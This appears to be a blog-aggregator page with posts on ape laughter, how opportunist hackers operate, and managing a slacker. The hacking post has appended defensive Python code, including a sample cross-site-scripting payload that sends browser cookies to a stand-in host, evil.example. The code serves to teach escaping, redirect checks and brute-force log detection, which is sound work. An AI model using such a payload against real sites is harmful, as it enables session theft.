Social Engineering Blogs

An Aggregator for Blogs About Social Engineering and Related Fields

The Humintell Blog July 23, 2015

Do Apes Laugh When Tickled?

Apes often make weird sounds when they’re tickled, and some researchers now say these pants and hoots truly are related to human laughter.

That’s the conclusion of a new study in the journal Current Biology that analyzed the “tickle-induced vocalizations” of infant and juvenile apes as well as human infants.

Filed Under: Science

Security Metrics Blog July 22, 2015

How Do Hackers Hack?

Crimes of opportunity lead the average hacker to valuable data.

By: Steve Snelgrove, CISSP

You might think hackers selectively pick each business they hack. While this may be true in high-profile or hacktivism cases, I estimate 90% of hacking is done based on a system's general lack of security. Hackers don't think, "Today I'm going to hack Acme Hardware across the street." They scan for the most vulnerable system and start digging.

To defend against attacks, it is important to understand that hackers have different motivations and capabilities.

The Opportunist Hacker: a crime of opportunity

These hackers stay up-to-date on security news. Once a vulnerability is made public, it is fairly easy to conduct a large-scale network scan for systems that exhibit symptoms of the vulnerability. After the hacker gets the list of vulnerable machines, he does additional research on the vulnerability and attempts to enter the system. Once inside, it is often easy to pivot and reach other, less hardened machines.

A great example of opportunist hackers in action arose when news of the Heartbleed vulnerability was released in April 2014. The vulnerability was publicly exposed in many news publications. Very shortly thereafter, hackers scanned the Internet looking for machines running vulnerable versions of OpenSSL, then attempted to exploit that vulnerability and enter the system. Piece of cake.

SEE ALSO: PCI 3.1, Stop Using SSL and Early TLS Immediately

But hackers don't necessarily require huge, newsworthy vulnerabilities in order to hack. There are thousands of other publicly known vulnerabilities they could take advantage of. For example, website forms often have validation flaws. An attacker may submit potentially malicious data in a form field, which is then echoed back to the user's browser and rendered to the screen. The screen displays a mix of server content and the attacker's malicious data (this is reflected cross-site scripting). This could result in unsuspecting users being redirected to another site where credentials or session information might be captured.

Does the hacker know which business or person he's hacking? No. And he doesn't care. He's attacking a system because it's vulnerable. Once the vulnerability is identified, the hacker will then attempt to profit from the exposure.

How do I defend against this attack?

The obvious defense against the public-vulnerability attack is to scan your own systems to discover vulnerabilities before an attacker does. Keep up-to-date on security news. Partner with a company that keeps abreast of publicly disclosed vulnerabilities. Regularly maintain and update your systems.

If a vulnerability similar to Heartbleed is released, do everything in your power to close it as soon as possible. Keep all other operating systems, browsers, and servers updated as well. Patching cannot stop a true zero-day (a flaw for which no fix exists yet), but it closes the far larger set of already-disclosed vulnerabilities that opportunist hackers actually scan for.

The Layabout Hacker: brute forcing

Somewhat less effective, but still pervasive, are brute force attacks. In these attacks, attackers control an army of computers infected with malware (known as botnets, made up of zombie computers). The attacker controls this network of computers, and they do the attacker's dirty work for him.

The attacker uses botnets to access systems by guessing usernames and passwords in millions of combinations until the right combination is found. It's not very effective. But, as my dad always said, "even a blind squirrel will find a nut every once in a while."

Hackers use botnets so each attempt is nearly impossible to trace back to the actual hacker.

How do I defend against this attack?

The two best ways to avoid this attack are monitoring your logs and regularly creating new passwords.

If a botnet tries to access your system through a brute force attack, your logs should record these actions. If your logs record thousands of failed login attempts on your system, you're probably being attacked. Note that a botnet spreads its guesses across many source addresses, so look at failures per targeted account as well as failures per source IP; a per-IP threshold alone can miss it.

The reason brute force attacks work so well is that millions of user credentials (usernames and passwords) have been dumped online in publicly available lists. Password lists are effective because the majority of people do not change their passwords and use the same passwords on multiple sites/systems, so a leaked credential from one site is simply replayed against others (credential stuffing), which needs far fewer guesses than blind brute forcing. To avoid this attack, change your personal and business passwords every 90 days, and never reuse passwords.

SEE ALSO: Vendor-Supplied Defaults Are A Serious Threat

Hackers have different motivations and capabilities. But these are their main methods.

What do hackers do after they get into a system?

Now the hacker starts prospecting. Remember, before this point the hacker still doesn't know whether he has hacked a business or a personal computer. Now he looks for evidence that the system is doing commerce, which means credit cards, healthcare information, or other valuable data might be present. To find this data, he runs keyword searches on the file systems and memory of the system.

For example, if his keyword searches reveal that the system he has hacked is a Micros system, he knows he has gained access to a business that accepts credit cards. (Micros is point-of-sale software used by many restaurants and hotels.) He will probably try Micros default passwords to get into the server and thus expand the range of the attack.

Install malware

If the hacker is successful in breaching the point-of-sale system, he can possibly install malware. The whole point of such malware is to gain access to valuable and sensitive information, such as credit card numbers, early in the data-processing stream, and to divert it so cybercriminals can reproduce cards or sell the stolen data on the black market.

Depending on the malware installed, every single customer credit card transaction made on that computer (and perhaps on the entire network) could be at risk.

Pivot

By now, the hacker in this scenario has probably filtered through enough company data to realize who he has hacked.

Perhaps the hacker has managed to attack and gain access to a national business with a chain of stores. If he finds remnant data on the system that includes the IP addresses of other chain locations, that chain is in serious trouble: those locations may have fewer security measures in place, and access to their networks could provide valuable information to the attacker.

Remnant data left on systems does occur in real-world cases. In a forensic investigation my colleague David Ellis conducted, a point-of-sale equipment installer left a partial client list on each and every point-of-sale system he had installed that year. Some 28 businesses were hacked because of the poor security awareness of that careless installer.

Leave no trace

At this point, it's time for the hacker to get out of the hacked system. Most hackers cover their tracks to avoid detection. They encrypt card data before transferring it out of a system, erase or modify security logs, and run malware from RAM instead of the hard drive, which often goes undetected by anti-virus software. This is also why logs should be forwarded to a separate system the attacker cannot reach: tampering on the compromised host then no longer erases the evidence.

SEE ALSO: Hacking Trends of 2014

Hackers don't care who you are. They just care how rich you can make them.

Read about 5 commonly overlooked security errors for tips to avoid being attacked.

Steven Snelgrove (CISSP) has been a Security Analyst at SecurityMetrics for over 7 years. Since 1980, Snelgrove has worked in the computer and telecommunications industry, and is familiar with programming, software engineering, and network security. His current responsibilities include the manual assessment of web applications and corporate networks, conducting ethical hacking to analyze security architecture, and consulting with organizations to help remediate issues. Snelgrove received a degree in Computer Science from Brigham Young University, and holds a CISSP (Certified Information Systems Security Professional) certification.
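The form-validation flaw described in the opportunist section above (attacker input echoed back into the page, and a redirect parameter abused to send users to a credential-harvesting site) is easiest to see with the vulnerable and hardened code side by side. The following is an added example and is not code from the SecurityMetrics post; the allowed host name and the sample malicious input are constructed for illustration.

```python
import html
from urllib.parse import urlparse

# Constructed sample input: a value an opportunist might submit in a "name" form field.
MALICIOUS_NAME = '<script>location="http://evil.example/steal?c="+document.cookie</script>'

# Hypothetical list of hosts that belong to this site (not from the original post).
ALLOWED_HOSTS = {"shop.example.com"}


def render_greeting_vulnerable(name: str) -> str:
    """Echo the submitted value straight into the page: reflected XSS."""
    return f"<p>Hello, {name}!</p>"


def render_greeting_safe(name: str) -> str:
    """HTML-escape the value so the browser renders it as text, not markup."""
    return f"<p>Hello, {html.escape(name, quote=True)}!</p>"


def safe_redirect_target(next_url: str, default: str = "/") -> str:
    """Return next_url only if it stays on this site; otherwise fall back to default.

    Rejects absolute URLs to foreign hosts, scheme-relative '//host' URLs,
    backslash tricks ('/\\host'), and non-http schemes such as javascript:.
    """
    parsed = urlparse(next_url)
    if parsed.scheme or parsed.netloc:
        # Absolute (or scheme-relative) URL: allow only our own hosts over https.
        if parsed.scheme == "https" and parsed.netloc in ALLOWED_HOSTS:
            return next_url
        return default
    # A site-local path must start with exactly one forward slash.
    if next_url.startswith("/") and not next_url.startswith(("//", "/\\")):
        return next_url
    return default


if __name__ == "__main__":
    print(render_greeting_vulnerable(MALICIOUS_NAME))  # script tag reaches the browser
    print(render_greeting_safe(MALICIOUS_NAME))        # rendered as harmless text
    for target in ("/account", "//evil.example/login",
                   "https://shop.example.com/cart", "javascript:alert(1)"):
        print(target, "->", safe_redirect_target(target))
```

The escaping shown is correct for text placed in the HTML body; a value dropped into an attribute, a URL, or a script block needs the encoding for that context instead. For redirects, an allow-list of your own hosts (as here) is safer than trying to block-list every foreign-host spelling a browser will accept.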
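The log-monitoring advice in the brute-force section above ("thousands of failed login attempts" means you are being attacked) can be turned into a check that runs over an auth log. This is an added example, not part of the SecurityMetrics post; the OpenSSH-style log lines are constructed sample data, and the thresholds and window are assumptions to tune for your own environment. It counts failures per source IP, which catches a single noisy attacker, and per targeted account, which catches the botnet case where each zombie makes only a handful of guesses.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Matches OpenSSH "Failed password" lines from a syslog-style auth log.
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def _failed(minute, second, user, ip, invalid=False):
    """Build one constructed log line (sample data, not a real log)."""
    tag = "invalid user " if invalid else ""
    return (f"Jul 22 03:{minute:02d}:{second:02d} pos1 sshd[4242]: "
            f"Failed password for {tag}{user} from {ip} port {40000 + second} ssh2")


# Constructed sample log: one noisy source, one account hit from many sources, normal traffic.
SAMPLE_LOG = (
    # 12 failures for root from a single IP within one minute: single-source brute force
    [_failed(14, s, "root", "203.0.113.5") for s in range(0, 60, 5)]
    # 16 failures for 'admin', one per source IP, spread over ~3 minutes: botnet-style
    + [_failed(20 + i // 6, (i % 6) * 10, "admin", f"198.51.100.{10 + i}", invalid=True)
       for i in range(16)]
    # a user who mistyped once and then logged in
    + [_failed(30, 1, "alice", "192.0.2.7"),
       "Jul 22 03:31:00 pos1 sshd[4243]: Accepted password for alice from 192.0.2.7 port 40001 ssh2"]
)


def parse_failures(lines, year=2015):
    """Return (timestamp, user, source_ip) for every failed-login line."""
    events = []
    for line in lines:
        m = FAILED_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["user"], m["ip"]))
    return events


def max_in_window(timestamps, window):
    """Largest number of events that fall inside any sliding window of the given length."""
    timestamps = sorted(timestamps)
    best = start = 0
    for end, ts in enumerate(timestamps):
        while ts - timestamps[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def find_attacks(events, window=timedelta(minutes=5),
                 per_ip_threshold=10, per_user_threshold=15):
    """Flag noisy source IPs and targeted accounts.

    Returns (noisy_ips, targeted_users): noisy_ips maps IP -> peak failures in a window;
    targeted_users maps account -> (peak failures, distinct source IPs). The second view
    is what catches a botnet, where no single IP crosses the per-IP threshold.
    """
    by_ip, by_user, ips_per_user = defaultdict(list), defaultdict(list), defaultdict(set)
    for ts, user, ip in events:
        by_ip[ip].append(ts)
        by_user[user].append(ts)
        ips_per_user[user].add(ip)
    noisy_ips = {}
    for ip, stamps in by_ip.items():
        peak = max_in_window(stamps, window)
        if peak >= per_ip_threshold:
            noisy_ips[ip] = peak
    targeted_users = {}
    for user, stamps in by_user.items():
        peak = max_in_window(stamps, window)
        if peak >= per_user_threshold:
            targeted_users[user] = (peak, len(ips_per_user[user]))
    return noisy_ips, targeted_users


if __name__ == "__main__":
    noisy, targeted = find_attacks(parse_failures(SAMPLE_LOG))
    print("noisy sources:", noisy)         # {'203.0.113.5': 12}
    print("targeted accounts:", targeted)  # {'admin': (16, 16)}
```

Run it against a real auth log by feeding the file's lines to parse_failures. The per-account view is the one worth alerting on for shared accounts such as admin or root; a high distinct-source count next to a high failure count is the signature of the botnet the post describes.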

Filed Under: Hacking

The Influence People Blog July 20, 2015

The Secret to Motivating a Slacker on Your Team

This week’s guest post is from Mike Figliuolo, the co-author of Lead Inside the Box: How Smart Leaders Guide Their Teams to Exceptional Results and the author of One Piece of Paper: The Simple Approach to Powerful, Personal Leadership. He’s the managing director of thoughtLEADERS, LLC – a leadership development training firm. An honor graduate from West Point, Mike served in the U.S. Army as a combat arms officer. Before founding his own company, he was an assistant professor at Duke University, a consultant at McKinsey & Co., and an executive at Capital One and Scotts Miracle-Gro. Mike regularly writes about leadership on the thoughtLEADERS Blog. His latest book, Lead Inside the Box: How Smart Leaders Guide Their Teams to Exceptional Results, has just come out and you can get your copy by clicking here. On a more personal note, Mike has been a good friend for many years and has generously shared his blogging expertise with me.

Brian Ahearn, CMCT®
Chief Influence Officer
influencePEOPLE
Helping You Learn to Hear “Yes”

The Secret to Motivating a Slacker on Your Team

Dave has a great résumé with the right education and expertise from brand-name schools and employers. When he accepted your job offer, you felt like you had made one of the best hires of your career.

Since Dave got the job, however, his talents haven’t translated into the results you expected. He’s a smart guy with great communication skills – at least his verbal communication skills. He’s outspoken in team meetings and has many ideas, most of which seem to have potential. Interestingly enough, however, those ideas relate to other people’s responsibilities. Dave’s willingness to comment on how others are doing or not doing their jobs is drawing complaints from your team. He has much less to say about his own area.

You hate the thought of losing someone as talented as Dave, but his lack of results is alarming. His teammates have picked up his slack. You’ve dedicated more of your leadership capital than you’d like harping on him to get his work done. There’s no doubt that Dave is a “Slacker.”

Approaches for Leading a Slacker

Leading Slackers requires you to “Unlock Motivation” within them. Slackers have the capability to do their jobs well. If they applied themselves, Slackers could be Exemplars on your team. Turning a Slacker around reduces the team conflict they create when they talk about everyone else’s work instead of doing their own. To be sure you’ve got a Slacker on your hands, assess their performance and see if they’re delivering the results you expect.

To turn Slackers around, first let them know their behavior isn’t acceptable. If they’ve avoided deadlines in the past, give them a real deadline to hit or face the consequences. Connect with your HR representative to start the performance improvement plan process. Document the expectations for the Slacker’s role, their performance against those objectives, and the specific goals they need to accomplish.

Set deadlines for completing their performance improvement plan and keeping their job. Make it clear that delivery of results is a condition of their employment. You’re not looking to threaten them – you’re merely explaining the cold, hard facts of their situation. Coach them that being smart isn’t enough. Reassure them you believe they have the ability to do the job – if they set their mind to it. Provide them a picture of what success could look like for them.

The painful first conversation with Slackers might be enough to turn them around. Other times they say they’ll improve but they never do. That behavior requires you to escalate the situation and put them on a formal performance improvement plan.

After putting your Slackers on a formal performance improvement plan, have a frank discussion with them about how they want to rectify the situation. Don’t limit the discussion to their role on your team – discuss their career aspirations too. Let them know that if they plan to keep slacking by relying on their smarts and reputation to get them through, they’re going to have a performance crisis that will be hard to recover from. If they don’t change their behavior, it will kill their career at some point.

If the combination of being put on a performance improvement plan and getting your frank assessment can’t motivate them to behave differently, ask them what it will take to get them to change. If they’re not interested in helping themselves, you can’t do it for them. These are potentially high-risk, high-return leadership investments.

Slackers have a decision to make that will determine your approach to leading them. If putting them on a performance improvement plan gets through to them, find the root cause of their problem. All that’s holding them back is their motivation. They could be bored with their work. Maybe they lack the skills required to plan their work and manage their time. Perhaps someone else on the team is stealing credit for their work. Your discussion about root causes could give you insight into how committed they are to change. If they’re not going to work hard in their current role, help them find their next one. Work with them, in consultation with your HR team, to see what kind of referral you can give them. For external referrals, you can point to the Slacker’s strengths. Leave it up to them to explain why they’re leaving their role.

Mike

Filed Under: Lead Inside the Box, Leadership


About

Welcome to an aggregator for blogs about social engineering and related fields. Feel free to take a look around, and make sure to visit the original sites.

If you would like to suggest a site or contact us, use the links below.

Contact

  • Contact
  • Suggest a Site
  • Remove a Site

© Copyright 2025 Social Engineering Blogs · All Rights Reserved ·